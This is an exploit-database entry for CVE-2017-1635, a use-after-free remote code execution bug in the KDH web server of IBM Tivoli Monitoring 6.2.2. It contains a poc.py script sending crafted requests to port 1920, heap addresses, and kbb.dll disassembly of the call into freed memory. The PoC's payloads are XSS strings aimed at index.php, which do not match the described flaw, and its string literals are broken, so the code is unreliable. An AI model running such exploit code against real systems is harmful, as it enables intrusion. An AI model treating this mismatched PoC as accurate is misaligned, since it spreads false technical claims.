Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtBot1337DAY-ID-29748
HistoryFeb 09, 2018 - 12:00 a.m.

IBM Tivoli Monitoring Remote Code Execution Exploit

2018-02-0900:00:00
bot
0day.today
45

EPSS

0.01

Percentile

83.7%

JSON

Exploit for multiple platform in category remote exploits

IBM Tivoli Monitoring CVE-2017-1635 Remote Code Execution Vulnerability

CVEID: CVE-2017-1635
CVSS Base Score: 8
Affected Products and Versions
The KDH component of IBM Tivoli Monitoring Basic Services (KGL,KAX) for
Version 6.2.2 through 6.2.2 Fix Pack 9


A vulnerability exists in the internal web server provided by IBM Tivoli
Monitoring basic services. It could allow a remote attacker to execute
arbitrary code on the system, caused by a use-after-free error. A remote
attacker could exploit this vulnerability to execute arbitrary code on
the system or cause the application to crash.
The web server component "KDH", after receiving certain requests,
executes a memory region in the heap previously freed by the component
itself.
An attacker is able to fill the heap before the memory is reused, in
order to execute arbitrary code.

poc.py
………………………………

import socket

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("localhost",1920))

payload = 'GET
/index.php?action=storenew&username=<script>alert()</script>index.php?action=storenew&username=<script>alert()</script>
HTTP/1.1\r\n\r\n'
s.send(payload)

payload = 'GET
/index.php?action=search&searchFor=\"><script>alert()</script >
HTTP/1.1\r\n\r\n'
s.send(payload)
print s.recv(1024)
………………………………

0x6191BCF8 - malloc in BSS1_NewFormat
0x61903fea - free in BSS1_EndFormat
0x6191BDEF - call to ecx+4

At first, malloc() is called to allocate space (0x400) where application
will put response page to the faulty request; then free() is called on
the same address used in the β€œcall [ecx+4]” later on.

The disassembly code involved is:
kbb.dll:61903FD7                 mov     eax, [edx]
kbb.dll:61903FD9                 push    eax
kbb.dll:61903FDA                 mov     ecx, [ebp-8]
kbb.dll:61903FDD                 call    dword ptr [ecx+4] <- here is
called the address of the previously freed heap + 4

Supporting techincal details:
As shown in the WinDbg screenshot
(http://www.quantumleap.it/wp-content/uploads/2018/02/tivoli_windbg.jpeg),
execution is suspended at 0x004c0931, where the payload is β€œ\xcc” -
breakpoint.


#  0day.today [2018-03-28]  #

Related

cvelist 1
ibm 1
cve 1
prion 1
nvd 1
cvelist
cvelist
CVE-2017-1635
2017-12-13 18:00:00
ibm
ibm
Security Bulletin: IBM Tivoli Monitoring is affected by a vulnerability in its internal web server
2018-06-17 15:47:23
cve
cve
CVE-2017-1635
2017-12-13 18:29:00
prion
prion
Design/Logic Flaw
2017-12-13 18:29:00
nvd
nvd
CVE-2017-1635
2017-12-13 18:29:00

EPSS

0.01

Percentile

83.7%

JSON
Related for 1337DAY-ID-29748
cvelist1ibm1cve1prion1nvd1